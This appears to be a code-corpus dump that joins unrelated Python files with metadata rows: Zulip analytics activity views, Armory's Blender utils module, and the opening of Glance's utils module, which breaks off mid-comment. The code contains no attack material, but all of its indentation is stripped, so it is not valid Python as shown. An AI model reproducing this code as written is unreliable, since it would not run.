def get_user_activity_records_for_email(email):
# type: (str) -> List[QuerySet]
fields = [
'user_profile__full_name',
'query',
'client__name',
'count',
'last_visit'
]
records = UserActivity.objects.filter(
user_profile__email=email
)
records = records.order_by("-last_visit")
records = records.select_related('user_profile', 'client').only(*fields)
return records
def raw_user_activity_table(records):
# type: (List[QuerySet]) -> str
cols = [
'query',
'client',
'count',
'last_visit'
]
def row(record):
# type: (QuerySet) -> List[Any]
return [
record.query,
record.client.name,
record.count,
format_date_for_activity_reports(record.last_visit)
]
rows = list(map(row, records))
title = 'Raw Data'
return make_table(title, cols, rows)
def get_user_activity_summary(records):
# type: (List[QuerySet]) -> Dict[str, Dict[str, Any]]
#: `Any` used above should be `Union(int, datetime)`.
#: However current version of `Union` does not work inside other function.
#: We could use something like:
# `Union[Dict[str, Dict[str, int]], Dict[str, Dict[str, datetime]]]`
#: but that would require this long `Union` to carry on throughout inner functions.
summary = {} # type: Dict[str, Dict[str, Any]]
def update(action, record):
# type: (str, QuerySet) -> None
if action not in summary:
summary[action] = dict(
count=record.count,
last_visit=record.last_visit
)
else:
summary[action]['count'] += record.count
summary[action]['last_visit'] = max(
summary[action]['last_visit'],
record.last_visit
)
if records:
summary['name'] = records[0].user_profile.full_name
for record in records:
client = record.client.name
query = record.query
update('use', record)
if client == 'API':
m = re.match('/api/.*/external/(.*)', query)
if m:
client = m.group(1)
update(client, record)
if client.startswith('desktop'):
update('desktop', record)
if client == 'website':
update('website', record)
if ('send_message' in query) or re.search('/api/.*/external/.*', query):
update('send', record)
if query in ['/json/update_pointer', '/json/users/me/pointer', '/api/v1/update_pointer']:
update('pointer', record)
update(client, record)
return summary
def format_date_for_activity_reports(date):
# type: (Optional[datetime]) -> str
if date:
return date.astimezone(eastern_tz).strftime('%Y-%m-%d %H:%M')
else:
return ''
def user_activity_link(email):
# type: (str) -> mark_safe
url_name = 'analytics.views.get_user_activity'
url = urlresolvers.reverse(url_name, kwargs=dict(email=email))
email_link = '<a href="%s">%s</a>' % (url, email)
return mark_safe(email_link)
def realm_activity_link(realm_str):
# type: (str) -> mark_safe
url_name = 'analytics.views.get_realm_activity'
url = urlresolvers.reverse(url_name, kwargs=dict(realm_str=realm_str))
realm_link = '<a href="%s">%s</a>' % (url, realm_str)
return mark_safe(realm_link)
def realm_client_table(user_summaries):
# type: (Dict[str, Dict[str, Dict[str, Any]]]) -> str
exclude_keys = [
'internal',
'name',
'use',
'send',
'pointer',
'website',
'desktop',
]
rows = []
for email, user_summary in user_summaries.items():
email_link = user_activity_link(email)
name = user_summary['name']
for k, v in user_summary.items():
if k in exclude_keys:
continue
client = k
count = v['count']
last_visit = v['last_visit']
row = [
format_date_for_activity_reports(last_visit),
client,
name,
email_link,
count,
]
rows.append(row)
rows = sorted(rows, key=lambda r: r[0], reverse=True)
cols = [
'Last visit',
'Client',
'Name',
'Email',
'Count',
]
title = 'Clients'
return make_table(title, cols, rows)
def user_activity_summary_table(user_summary):
# type: (Dict[str, Dict[str, Any]]) -> str
rows = []
for k, v in user_summary.items():
if k == 'name':
continue
client = k
count = v['count']
last_visit = v['last_visit']
row = [
format_date_for_activity_reports(last_visit),
client,
count,
]
rows.append(row)
rows = sorted(rows, key=lambda r: r[0], reverse=True)
cols = [
'last_visit',
'client',
'count',
]
title = 'User Activity'
return make_table(title, cols, rows)
def realm_user_summary_table(all_records, admin_emails):
# type: (List[QuerySet], Set[Text]) -> Tuple[Dict[str, Dict[str, Any]], str]
user_records = {}
def by_email(record):
# type: (QuerySet) -> str
return record.user_profile.email
for email, records in itertools.groupby(all_records, by_email):
user_records[email] = get_user_activity_summary(list(records))
def get_last_visit(user_summary, k):
# type: (Dict[str, Dict[str, datetime]], str) -> Optional[datetime]
if k in user_summary:
return user_summary[k]['last_visit']
else:
return None
def get_count(user_summary, k):
# type: (Dict[str, Dict[str, str]], str) -> str
if k in user_summary:
return user_summary[k]['count']
else:
return ''
def is_recent(val):
# type: (Optional[datetime]) -> bool
age = datetime.now(val.tzinfo) - val
return age.total_seconds() < 5 * 60
rows = []
for email, user_summary in user_records.items():
email_link = user_activity_link(email)
sent_count = get_count(user_summary, 'send')
cells = [user_summary['name'], email_link, sent_count]
row_class = ''
for field in ['use', 'send', 'pointer', 'desktop', 'ZulipiOS', 'Android']:
visit = get_last_visit(user_summary, field)
if field == 'use':
if visit and is_recent(visit):
row_class += ' recently_active'
if email in admin_emails:
row_class += ' admin'
val = format_date_for_activity_reports(visit)
cells.append(val)
row = dict(cells=cells, row_class=row_class)
rows.append(row)
def by_used_time(row):
# type: (Dict[str, Any]) -> str
return row['cells'][3]
rows = sorted(rows, key=by_used_time, reverse=True)
cols = [
'Name',
'Email',
'Total sent',
'Heard from',
'Message sent',
'Pointer motion',
'Desktop',
'ZulipiOS',
'Android',
]
title = 'Summary'
content = make_table(title, cols, rows, has_row_class=True)
return user_records, content
@zulip_internal
def get_realm_activity(request, realm_str):
# type: (HttpRequest, str) -> HttpResponse
data = [] # type: List[Tuple[str, str]]
all_user_records = {} # type: Dict[str, Any]
try:
admins = Realm.objects.get(string_id=realm_str).get_admin_users()
except Realm.DoesNotExist:
return HttpResponseNotFound("Realm %s does not exist" % (realm_str,))
admin_emails = {admin.email for admin in admins}
for is_bot, page_title in [(False, 'Humans'), (True, 'Bots')]:
all_records = list(get_user_activity_records_for_realm(realm_str, is_bot))
user_records, content = realm_user_summary_table(all_records, admin_emails)
all_user_records.update(user_records)
data += [(page_title, content)]
page_title = 'Clients'
content = realm_client_table(all_user_records)
data += [(page_title, content)]
page_title = 'History'
content = sent_messages_report(realm_str)
data += [(page_title, content)]
realm_link = 'https://stats1.zulip.net:444/render/?from=-7days'
realm_link += '&target=stats.gauges.staging.users.active.%s.0_16hr' % (realm_str,)
title = realm_str
return render_to_response(
'analytics/activity.html',
dict(data=data, realm_link=realm_link, title=title),
request=request
)
@zulip_internal
def get_user_activity(request, email):
# type: (HttpRequest, str) -> HttpResponse
records = get_user_activity_records_for_email(email)
data = [] # type: List[Tuple[str, str]]
user_summary = get_user_activity_summary(records)
content = user_activity_summary_table(user_summary)
data += [('Summary', content)]
content = raw_user_activity_table(records)
data += [('Info', content)]
title = email
return render_to_response(
'analytics/activity.html',
dict(data=data, title=title),
request=request
)
|
apache-2.0
| 1,357,763,504,589,575,200
| 32.502262
| 123
| 0.557969
| false
| 3.885798
| false
| false
| false
|
luboslenco/cyclesgame
|
blender/arm/utils.py
|
1
|
24354
|
import bpy
import json
import os
import glob
import platform
import zipfile
import re
import subprocess
import webbrowser
import numpy as np
import arm.lib.armpack
import arm.make_state as state
import arm.log as log
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def write_arm(filepath, output):
if filepath.endswith('.zip'):
with zipfile.ZipFile(filepath, 'w', zipfile.ZIP_DEFLATED) as zip_file:
if bpy.data.worlds['Arm'].arm_minimize:
zip_file.writestr('data.arm', arm.lib.armpack.packb(output))
else:
zip_file.writestr('data.json', json.dumps(output, sort_keys=True, indent=4, cls=NumpyEncoder))
else:
if bpy.data.worlds['Arm'].arm_minimize:
with open(filepath, 'wb') as f:
f.write(arm.lib.armpack.packb(output))
else:
filepath_json = filepath.split('.arm')[0] + '.json'
with open(filepath_json, 'w') as f:
f.write(json.dumps(output, sort_keys=True, indent=4, cls=NumpyEncoder))
def unpack_image(image, path, file_format='JPEG'):
print('Armory Info: Unpacking to ' + path)
image.filepath_raw = path
image.file_format = file_format
image.save()
def convert_image(image, path, file_format='JPEG'):
# Convert image to compatible format
print('Armory Info: Converting to ' + path)
ren = bpy.context.scene.render
orig_quality = ren.image_settings.quality
orig_file_format = ren.image_settings.file_format
orig_color_mode = ren.image_settings.color_mode
ren.image_settings.quality = 90
ren.image_settings.file_format = file_format
if file_format == 'PNG':
ren.image_settings.color_mode = 'RGBA'
image.save_render(path, scene=bpy.context.scene)
ren.image_settings.quality = orig_quality
ren.image_settings.file_format = orig_file_format
ren.image_settings.color_mode = orig_color_mode
def blend_name():
return bpy.path.basename(bpy.context.blend_data.filepath).rsplit('.')[0]
def build_dir():
return 'build_' + safestr(blend_name())
def get_fp():
wrd = bpy.data.worlds['Arm']
if wrd.arm_project_root != '':
return bpy.path.abspath(wrd.arm_project_root)
else:
s = bpy.data.filepath.split(os.path.sep)
s.pop()
return os.path.sep.join(s)
def get_fp_build():
return get_fp() + '/' + build_dir()
def get_os():
s = platform.system()
if s == 'Windows':
return 'win'
elif s == 'Darwin':
return 'mac'
else:
return 'linux'
def get_gapi():
wrd = bpy.data.worlds['Arm']
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
return getattr(item, target_to_gapi(item.arm_project_target))
if wrd.arm_runtime == 'Browser':
return 'webgl'
return arm.utils.get_player_gapi()
def get_rp():
wrd = bpy.data.worlds['Arm']
return wrd.arm_rplist[wrd.arm_rplist_index]
def bundled_sdk_path():
if get_os() == 'mac':
# SDK on MacOS is located in .app folder due to security
p = bpy.app.binary_path
if p.endswith('Contents/MacOS/blender'):
return p[:-len('Contents/MacOS/blender')] + '/armsdk/'
else:
return p[:-len('Contents/MacOS/./blender')] + '/armsdk/'
elif get_os() == 'linux':
# /blender
return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/'
else:
# /blender.exe
return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/'
# Passed by load_post handler when armsdk is found in project folder
use_local_sdk = False
def get_sdk_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons["armory"].preferences
p = bundled_sdk_path()
if use_local_sdk:
return get_fp() + '/armsdk/'
elif os.path.exists(p) and addon_prefs.sdk_bundled:
return p
else:
return addon_prefs.sdk_path
def get_ide_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons["armory"].preferences
return '' if not hasattr(addon_prefs, 'ide_path') else addon_prefs.ide_path
def get_ffmpeg_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return addon_prefs.ffmpeg_path
def get_renderdoc_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
p = addon_prefs.renderdoc_path
if p == '' and get_os() == 'win':
pdefault = 'C:\\Program Files\\RenderDoc\\qrenderdoc.exe'
if os.path.exists(pdefault):
p = pdefault
return p
def get_player_gapi():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'opengl' if not hasattr(addon_prefs, 'player_gapi_' + get_os()) else getattr(addon_prefs, 'player_gapi_' + get_os())
def get_code_editor():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'kodestudio' if not hasattr(addon_prefs, 'code_editor') else addon_prefs.code_editor
def get_ui_scale():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 1.0 if not hasattr(addon_prefs, 'ui_scale') else addon_prefs.ui_scale
def get_khamake_threads():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 1 if not hasattr(addon_prefs, 'khamake_threads') else addon_prefs.khamake_threads
def get_compilation_server():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'compilation_server') else addon_prefs.compilation_server
def get_save_on_build():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'save_on_build') else addon_prefs.save_on_build
def get_viewport_controls():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'qwerty' if not hasattr(addon_prefs, 'viewport_controls') else addon_prefs.viewport_controls
def get_legacy_shaders():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'legacy_shaders') else addon_prefs.legacy_shaders
def get_relative_paths():
# Convert absolute paths to relative
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'relative_paths') else addon_prefs.relative_paths
def get_node_path():
if get_os() == 'win':
return get_sdk_path() + '/nodejs/node.exe'
elif get_os() == 'mac':
return get_sdk_path() + '/nodejs/node-osx'
else:
return get_sdk_path() + '/nodejs/node-linux64'
def get_kha_path():
if os.path.exists('Kha'):
return 'Kha'
return get_sdk_path() + '/Kha'
def get_haxe_path():
if get_os() == 'win':
return get_kha_path() + '/Tools/haxe/haxe.exe'
elif get_os() == 'mac':
return get_kha_path() + '/Tools/haxe/haxe-osx'
else:
return get_kha_path() + '/Tools/haxe/haxe-linux64'
def get_khamake_path():
return get_kha_path() + '/make'
def krom_paths(bin_ext=''):
sdk_path = get_sdk_path()
if arm.utils.get_os() == 'win':
krom_location = sdk_path + '/Krom'
krom_path = krom_location + '/Krom' + bin_ext + '.exe'
elif arm.utils.get_os() == 'mac':
krom_location = sdk_path + '/Krom/Krom.app/Contents/MacOS'
krom_path = krom_location + '/Krom' + bin_ext
else:
krom_location = sdk_path + '/Krom'
krom_path = krom_location + '/Krom' + bin_ext
return krom_location, krom_path
def fetch_bundled_script_names():
wrd = bpy.data.worlds['Arm']
wrd.arm_bundled_scripts_list.clear()
os.chdir(get_sdk_path() + '/armory/Sources/armory/trait')
for file in glob.glob('*.hx'):
wrd.arm_bundled_scripts_list.add().name = file.rsplit('.')[0]
script_props = {}
script_props_defaults = {}
def fetch_script_props(file):
with open(file) as f:
if '/' in file:
file = file.split('/')[-1]
if '\\' in file:
file = file.split('\\')[-1]
name = file.rsplit('.')[0]
script_props[name] = []
script_props_defaults[name] = []
lines = f.read().splitlines()
read_prop = False
for l in lines:
if not read_prop:
read_prop = l.lstrip().startswith('@prop')
if read_prop and 'var ' in l:
p = l.split('var ')[1]
valid_prop = False
# Has type
if ':' in p:
# Fetch default value
if '=' in p:
s = p.split('=')
ps = s[0].split(':')
prop = (ps[0].strip(), ps[1].split(';')[0].strip())
prop_value = s[1].split(';')[0].replace('\'', '').replace('"', '').strip()
valid_prop = True
else:
ps = p.split(':')
prop = (ps[0].strip(), ps[1].split(';')[0].strip())
prop_value = ''
valid_prop = True
# Fetch default value
elif '=' in p:
s = p.split('=')
prop = (s[0].strip(), None)
prop_value = s[1].split(';')[0].replace('\'', '').replace('"', '').strip()
valid_prop = True
# Register prop
if valid_prop:
script_props[name].append(prop)
script_props_defaults[name].append(prop_value)
read_prop = False
def fetch_script_names():
if bpy.data.filepath == "":
return
wrd = bpy.data.worlds['Arm']
# Sources
wrd.arm_scripts_list.clear()
sources_path = get_fp() + '/Sources/' + safestr(wrd.arm_project_package)
if os.path.isdir(sources_path):
os.chdir(sources_path)
# Glob supports recursive search since python 3.5 so it should cover both blender 2.79 and 2.8 integrated python
for file in glob.glob('**/*.hx', recursive=True):
name = file.rsplit('.')[0]
# Replace the path syntax for package syntax so that it can be searchable in blender traits "Class" dropdown
wrd.arm_scripts_list.add().name = name.replace(os.sep, '.')
fetch_script_props(file)
# Canvas
wrd.arm_canvas_list.clear()
canvas_path = get_fp() + '/Bundled/canvas'
if os.path.isdir(canvas_path):
os.chdir(canvas_path)
for file in glob.glob('*.json'):
wrd.arm_canvas_list.add().name = file.rsplit('.')[0]
os.chdir(get_fp())
def fetch_wasm_names():
if bpy.data.filepath == "":
return
wrd = bpy.data.worlds['Arm']
# WASM modules
wrd.arm_wasm_list.clear()
sources_path = get_fp() + '/Bundled'
if os.path.isdir(sources_path):
os.chdir(sources_path)
for file in glob.glob('*.wasm'):
name = file.rsplit('.')[0]
wrd.arm_wasm_list.add().name = name
os.chdir(get_fp())
def fetch_trait_props():
for o in bpy.data.objects:
fetch_prop(o)
for s in bpy.data.scenes:
fetch_prop(s)
def fetch_prop(o):
for item in o.arm_traitlist:
if item.name not in script_props:
continue
props = script_props[item.name]
defaults = script_props_defaults[item.name]
# Remove old props
for i in range(len(item.arm_traitpropslist) - 1, -1, -1):
ip = item.arm_traitpropslist[i]
# if ip.name not in props:
if ip.name.split('(')[0] not in [p[0] for p in props]:
item.arm_traitpropslist.remove(i)
# Add new props
for i in range(0, len(props)):
p = props[i]
found = False
for ip in item.arm_traitpropslist:
if ip.name.replace(')', '').split('(')[0] == p[0]:
found = ip
break
# Not in list
if not found:
prop = item.arm_traitpropslist.add()
prop.name = p[0] + ('(' + p[1] + ')' if p[1] else '')
prop.value = defaults[i]
if found:
prop = item.arm_traitpropslist[found.name]
f = found.name.replace(')', '').split('(')
# Default value added and current value is blank (no override)
if (not found.value and defaults[i]):
prop.value = defaults[i]
# Type has changed, update displayed name
if (len(f) == 1 or (len(f) > 1 and f[1] != p[1])):
prop.name = p[0] + ('(' + p[1] + ')' if p[1] else '')
def fetch_bundled_trait_props():
# Bundled script props
for o in bpy.data.objects:
for t in o.arm_traitlist:
if t.type_prop == 'Bundled Script':
file_path = get_sdk_path() + '/armory/Sources/armory/trait/' + t.name + '.hx'
if os.path.exists(file_path):
fetch_script_props(file_path)
fetch_prop(o)
def update_trait_collections():
for col in bpy.data.collections:
if col.name.startswith('Trait|'):
bpy.data.collections.remove(col)
for o in bpy.data.objects:
for t in o.arm_traitlist:
if 'Trait|' + t.name not in bpy.data.collections:
col = bpy.data.collections.new('Trait|' + t.name)
else:
col = bpy.data.collections['Trait|' + t.name]
col.objects.link(o)
def to_hex(val):
return '#%02x%02x%02x%02x' % (int(val[3] * 255), int(val[0] * 255), int(val[1] * 255), int(val[2] * 255))
def color_to_int(val):
return (int(val[3] * 255) << 24) + (int(val[0] * 255) << 16) + (int(val[1] * 255) << 8) + int(val[2] * 255)
def safesrc(s):
s = safestr(s).replace('.', '_').replace('-', '_').replace(' ', '')
if s[0].isdigit():
s = '_' + s
return s
def safestr(s):
for c in r'[]/\;,><&*:%=+@!#^()|?^':
s = s.replace(c, '_')
return ''.join([i if ord(i) < 128 else '_' for i in s])
def asset_name(bdata):
s = bdata.name
# Append library name if linked
if bdata.library != None:
s += '_' + bdata.library.name
return s
def asset_path(s):
return s[2:] if s[:2] == '//' else s # Remove leading '//'
def extract_filename(s):
return os.path.basename(asset_path(s))
def get_render_resolution(scene):
render = scene.render
scale = render.resolution_percentage / 100
return int(render.resolution_x * scale), int(render.resolution_y * scale)
def get_project_scene_name():
return get_active_scene().name
def get_active_scene():
if not state.is_export:
return bpy.context.scene
else:
wrd = bpy.data.worlds['Arm']
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
return item.arm_project_scene
def logic_editor_space(context_screen=None):
if context_screen == None:
context_screen = bpy.context.screen
if context_screen != None:
areas = context_screen.areas
for area in areas:
for space in area.spaces:
if space.type == 'NODE_EDITOR':
if space.node_tree != None and space.node_tree.bl_idname == 'ArmLogicTreeType':
return space
return None
def voxel_support():
# macos does not support opengl 4.5, needs metal
return state.target != 'html5' and get_os() != 'mac'
def get_cascade_size(rpdat):
cascade_size = int(rpdat.rp_shadowmap_cascade)
# Clamp to 4096 per cascade
if int(rpdat.rp_shadowmap_cascades) > 1 and cascade_size > 4096:
cascade_size = 4096
return cascade_size
def check_saved(self):
if bpy.data.filepath == "":
msg = "Save blend file first"
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
return True
def check_path(s):
for c in r'[];><&*%=+@!#^()|?^':
if c in s:
return False
for c in s:
if ord(c) > 127:
return False
return True
def check_sdkpath(self):
s = get_sdk_path()
if check_path(s) == False:
msg = "SDK path '{0}' contains special characters. Please move SDK to different path for now.".format(s)
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
else:
return True
def check_projectpath(self):
s = get_fp()
if check_path(s) == False:
msg = "Project path '{0}' contains special characters, build process may fail.".format(s)
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
else:
return True
def disp_enabled(target):
rpdat = get_rp()
if rpdat.arm_rp_displacement == 'Tessellation':
return target == 'krom' or target == 'native'
return rpdat.arm_rp_displacement != 'Off'
def is_object_animation_enabled(bobject):
# Checks if animation is present and enabled
if bobject.arm_animation_enabled == False or bobject.type == 'BONE' or bobject.type == 'ARMATURE':
return False
if bobject.animation_data and bobject.animation_data.action:
return True
return False
def is_bone_animation_enabled(bobject):
# Checks if animation is present and enabled for parented armature
if bobject.parent and bobject.parent.type == 'ARMATURE':
if bobject.parent.arm_animation_enabled == False:
return False
# Check for present actions
adata = bobject.parent.animation_data
has_actions = adata != None and adata.action != None
if not has_actions and adata != None:
if hasattr(adata, 'nla_tracks') and adata.nla_tracks != None:
for track in adata.nla_tracks:
if track.strips == None:
continue
for strip in track.strips:
if strip.action == None:
continue
has_actions = True
break
if has_actions:
break
if adata != None and has_actions:
return True
return False
def export_bone_data(bobject):
return bobject.find_armature() and is_bone_animation_enabled(bobject) and get_rp().arm_skin == 'On'
def kode_studio_mklink_win(sdk_path, ide_path):
# Fight long-path issues on Windows
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('mklink /J "%s" "%s"' % (source, target), shell=True)
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('mklink /J "%s" "%s"' % (source, target), shell=True)
def kode_studio_mklink_linux(sdk_path, ide_path):
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('ln -s "%s" "%s"' % (target, source), shell=True)
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('ln -s "%s" "%s"' % (target, source), shell=True)
def kode_studio_mklink_mac(sdk_path, ide_path):
if not os.path.exists(ide_path + '/Contents/Resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/Contents/Resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('ln -fs "%s" "%s"' % (target, source), shell=True)
if not os.path.exists(ide_path + '/Contents/Resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/Contents/Resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('ln -fs "%s" "%s"' % (target, source), shell=True)
def get_kode_path():
p = get_ide_path()
if p == '':
if get_os() == 'win':
p = get_sdk_path() + '/win32'
elif get_os() == 'mac':
p = get_sdk_path() + '/KodeStudio.app'
else:
p = get_sdk_path() + '/linux64'
return p
def get_kode_bin():
p = get_kode_path()
if get_os() == 'win':
return p + '/Kode Studio.exe'
elif get_os() == 'mac':
return p + '/Contents/MacOS/Electron'
else:
return p + '/kodestudio'
def get_vscode_bin():
p = get_kode_path()
if get_os() == 'win':
return p + '/Code.exe'
elif get_os() == 'mac':
return p + '/Contents/MacOS/Electron'
else:
return p + '/code'
def kode_studio(hx_path=None):
project_path = arm.utils.get_fp()
kode_bin = get_kode_bin()
if not os.path.exists(kode_bin):
kode_bin = get_vscode_bin()
if os.path.exists(kode_bin) and get_code_editor() == 'kodestudio':
if arm.utils.get_os() == 'win':
# kode_studio_mklink_win(get_sdk_path(), get_kode_path())
args = [kode_bin, arm.utils.get_fp()]
if hx_path != None:
args.append(hx_path)
subprocess.Popen(args)
elif arm.utils.get_os() == 'mac':
# kode_studio_mklink_mac(get_sdk_path(), get_kode_path())
args = ['"' + kode_bin + '"' + ' "' + arm.utils.get_fp() + '"']
if hx_path != None:
args[0] += ' "' + hx_path + '"'
subprocess.Popen(args, shell=True)
else:
# kode_studio_mklink_linux(get_sdk_path(), get_kode_path())
args = [kode_bin, arm.utils.get_fp()]
if hx_path != None:
args.append(hx_path)
subprocess.Popen(args)
else:
fp = hx_path if hx_path != None else arm.utils.get_fp()
webbrowser.open('file://' + fp)
def def_strings_to_array(strdefs):
defs = strdefs.split('_')
defs = defs[1:]
defs = ['_' + d for d in defs] # Restore _
return defs
def get_kha_target(target_name): # TODO: remove
if target_name == 'macos-hl':
return 'osx-hl'
elif target_name.startswith('krom'): # krom-windows
return 'krom'
elif target_name == 'custom':
return ''
return target_name
def target_to_gapi(arm_project_target):
# TODO: align target names
if arm_project_target == 'krom':
return 'arm_gapi_' + arm.utils.get_os()
elif arm_project_target == 'krom-windows':
return 'arm_gapi_win'
elif arm_project_target == 'windows-hl':
return 'arm_gapi_win'
elif arm_project_target == 'krom-linux':
return 'arm_gapi_linux'
elif arm_project_target == 'linux-hl':
return 'arm_gapi_linux'
elif arm_project_target == 'krom-macos':
return 'arm_gapi_mac'
elif arm_project_target == 'macos-hl':
return 'arm_gapi_mac'
elif arm_project_target == 'android-native-hl':
return 'arm_gapi_android'
elif arm_project_target == 'ios-hl':
return 'arm_gapi_ios'
elif arm_project_target == 'node':
return 'arm_gapi_html5'
else: # html5, custom
return 'arm_gapi_' + arm_project_target
def check_default_props():
wrd = bpy.data.worlds['Arm']
if len(wrd.arm_rplist) == 0:
wrd.arm_rplist.add()
wrd.arm_rplist_index = 0
if wrd.arm_project_name == '':
# Take blend file name
wrd.arm_project_name = arm.utils.blend_name()
def register(local_sdk=False):
global use_local_sdk
use_local_sdk = local_sdk
def unregister():
pass
|
lgpl-3.0
| 2,749,772,502,997,039,600
| 35.08
| 127
| 0.581137
| false
| 3.396179
| false
| false
| false
|
ozamiatin/glance
|
glance/common/utils.py
|
1
|
26028
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2014 SoftLayer Technologies, Inc.
# Copyright 2015 Mirantis, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
System-level utilities and helper functions.
"""
import errno
try:
from eventlet import sleep
except ImportError:
from time import sleep
from eventlet.green import socket
import functools
import os
import platform
import re
import subprocess
import sys
import uuid
from OpenSSL import crypto
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import netutils
from oslo_utils import strutils
import six
from webob import exc
from glance.common import exception
from glance import i18n
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
_ = i18n._
_LE = i18n._LE
FEATURE_BLACKLIST = ['content-length', 'content-type', 'x-image-meta-size']
# Whitelist of v1 API headers of form x-image-meta-xxx
IMAGE_META_HEADERS = ['x-image-meta-location', 'x-image-meta-size',
'x-image-meta-is_public', 'x-image-meta-disk_format',
'x-image-meta-container_format', 'x-image-meta-name',
'x-image-meta-status', 'x-image-meta-copy_from',
'x-image-meta-uri', 'x-image-meta-checksum',
'x-image-meta-created_at', 'x-image-meta-updated_at',
'x-image-meta-deleted_at', 'x-image-meta-min_ram',
'x-image-meta-min_disk', 'x-image-meta-owner',
'x-image-meta-store', 'x-image-meta-id',
'x-image-meta-protected', 'x-image-meta-deleted',
'x-image-meta-virtual_size']
GLANCE_TEST_SOCKET_FD_STR = 'GLANCE_TEST_SOCKET_FD'
def chunkreadable(iter, chunk_size=65536):
"""
Wrap a readable iterator with a reader yielding chunks of
a preferred size, otherwise leave iterator unchanged.
:param iter: an iter which may also be readable
:param chunk_size: maximum size of chunk
"""
return chunkiter(iter, chunk_size) if hasattr(iter, 'read') else iter
def chunkiter(fp, chunk_size=65536):
"""
Return an iterator to a file-like obj which yields fixed size chunks
:param fp: a file-like object
:param chunk_size: maximum size of chunk
"""
while True:
chunk = fp.read(chunk_size)
if chunk:
yield chunk
else:
break
def cooperative_iter(iter):
"""
Return an iterator which schedules after each
iteration. This can prevent eventlet thread starvation.
:param iter: an iterator to wrap
"""
try:
for chunk in iter:
sleep(0)
yield chunk
except Exception as err:
with excutils.save_and_reraise_exception():
msg = _LE("Error: cooperative_iter exception %s") % err
LOG.error(msg)
def cooperative_read(fd):
"""
Wrap a file descriptor's read with a partial function which schedules
after each read. This can prevent eventlet thread starvation.
:param fd: a file descriptor to wrap
"""
def readfn(*args):
result = fd.read(*args)
sleep(0)
return result
return readfn
MAX_COOP_READER_BUFFER_SIZE = 134217728 # 128M seems like a sane buffer limit
class CooperativeReader(object):
"""
An eventlet thread friendly class for reading in image data.
When accessing data either through the iterator or the read method
we perform a sleep to allow a co-operative yield. When there is more than
one image being uploaded/downloaded this prevents eventlet thread
starvation, ie allows all threads to be scheduled periodically rather than
having the same thread be continuously active.
"""
def __init__(self, fd):
"""
:param fd: Underlying image file object
"""
self.fd = fd
self.iterator = None
# NOTE(markwash): if the underlying supports read(), overwrite the
# default iterator-based implementation with cooperative_read which
# is more straightforward
if hasattr(fd, 'read'):
self.read = cooperative_read(fd)
else:
self.iterator = None
self.buffer = ''
self.position = 0
def read(self, length=None):
"""Return the requested amount of bytes, fetching the next chunk of
the underlying iterator when needed.
This is replaced with cooperative_read in __init__ if the underlying
fd already supports read().
"""
if length is None:
if len(self.buffer) - self.position > 0:
# if no length specified but some data exists in buffer,
# return that data and clear the buffer
result = self.buffer[self.position:]
self.buffer = ''
self.position = 0
return str(result)
else:
# otherwise read the next chunk from the underlying iterator
# and return it as a whole. Reset the buffer, as subsequent
# calls may specify the length
try:
if self.iterator is None:
self.iterator = self.__iter__()
return self.iterator.next()
except StopIteration:
return ''
finally:
self.buffer = ''
self.position = 0
else:
result = bytearray()
while len(result) < length:
if self.position < len(self.buffer):
to_read = length - len(result)
chunk = self.buffer[self.position:self.position + to_read]
result.extend(chunk)
# This check is here to prevent potential OOM issues if
# this code is called with unreasonably high values of read
# size. Currently it is only called from the HTTP clients
# of Glance backend stores, which use httplib for data
